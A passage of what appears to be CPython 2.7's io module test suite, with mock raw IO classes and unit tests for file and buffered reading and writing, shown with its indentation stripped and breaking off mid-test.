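#     class PyExampleTest(ExampleTest):
#         tp = pyio.BytesIO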
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def byteslike(*pos, **kw):
return memoryview(bytearray(*pos, **kw))
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data.tobytes(), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
bytes_fn = fn_with_NUL.encode('ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(TypeError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when next() returns an object without __len__
class R(self.IOBase):
def next(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OS X this test consumes large resources; it takes
# a long time to build the >2GB file and uses >2GB of disk space,
# so the 'largefile' resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
stream = Stream()
buffer = byteslike(5)
self.assertEqual(stream.readinto(buffer), 5)
self.assertEqual(buffer.tobytes(), b"12345")
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
@unittest.skipIf(sys.platform == 'cli', 'Bad behaviour on ipy')
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so that
        # checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
